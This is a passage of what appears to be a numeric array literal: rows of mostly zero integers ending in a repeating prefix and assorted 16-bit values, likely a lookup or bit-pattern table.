[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 42628, 40257, 57062, 19462, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 20992, 42112, 9504, 16968, 13650, 33989],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 3460, 46145, 19430, 51462, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 18176, 27072, 15472, 27292, 21063, 35308],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 29828, 52033, 47334, 17926, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 39424, 63104, 47520, 11743],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 56196, 57921, 9702, 49926, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 11520, 21312, 51920, 45364, 7213, 41870],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 17028, 63809, 37606, 16390, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 65024, 61312, 40928, 38648, 52990, 46249],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 43396, 4161, 65510, 48390, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 25344, 20672, 32304, 59660, 12387, 47264],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 4228, 10049, 27878, 14854, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 6912, 61120, 53680, 12524, 38819],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 27664, 30596, 15937, 55782, 46854, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 9216, 26880, 49728, 28304, 55332, 53353, 51618],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 56964, 21825, 18150, 13318, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 59904, 51840, 32416, 25768, 40682, 333],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 17796, 27713, 46054, 45318, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 48896, 1984, 62448, 38012, 37311, 62228],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 44164, 33601, 8422, 11782, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 30720, 56832, 34688, 40416, 48248, 26663],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 4996, 39489, 36326, 43782, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 58624, 33088, 42576, 1044, 48613, 36214],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 31364, 45377, 64230, 10246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 5632, 13696, 33120, 56152, 61718, 11953],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 57732, 51265, 26598, 42246, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 23296, 36544, 23984, 23788, 45659, 19784],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 18564, 57153, 54502, 8710, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 9280, 2832, 18500, 17259],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 44932, 63041, 16870, 40710, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 41216, 36928, 12816, 42244, 16545, 25354],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 5764, 3393, 44774, 7174, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 33280, 12416, 26656, 11016, 20866, 49365],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 32132, 9281, 7142, 39174, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 14080, 58816, 31600, 12892, 3639, 39740],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 58500, 15169, 35046, 5638, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 34048, 51520, 80, 36207],
